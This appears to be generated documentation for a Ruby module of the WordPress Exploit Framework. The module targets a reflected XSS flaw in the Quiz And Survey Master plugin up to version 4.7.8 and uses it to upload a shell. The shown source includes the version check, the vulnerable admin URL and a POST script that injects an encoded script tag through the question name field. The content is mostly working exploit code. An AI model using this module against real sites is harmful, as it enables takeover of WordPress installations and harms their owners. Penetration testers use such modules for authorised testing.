class Wpxf::Exploit::QuizAndSurveyMasterReflectedXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StagedReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/quiz_and_survey_master_reflected_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Quiz And Survey Master <= 4.7.8 Reflected XSS Shell Upload', author: [ 'Tom Adams', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8698'], ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/63'] ], date: 'Dec 15 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/quiz_and_survey_master_reflected_xss_shell_upload.rb, line 23 def check check_plugin_version_from_readme('quiz-master-next', '4.7.9') end
initial_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/quiz_and_survey_master_reflected_xss_shell_upload.rb, line 35 def initial_script create_basic_post_script( vulnerable_url, 'question_type' => '0', 'question_name' => "<script>#{xss_ascii_encoded_include_script}<\\/script>", 'question_submission' => 'new_question', 'quiz_id' => quiz_id ) end
quiz_id()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/quiz_and_survey_master_reflected_xss_shell_upload.rb, line 27 def quiz_id @quiz_id ||= Utility::Text.rand_numeric(3) end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/quiz_and_survey_master_reflected_xss_shell_upload.rb, line 31 def vulnerable_url normalize_uri(wordpress_url_admin, "admin.php?page=mlw_quiz_options&quiz_id=#{quiz_id}") end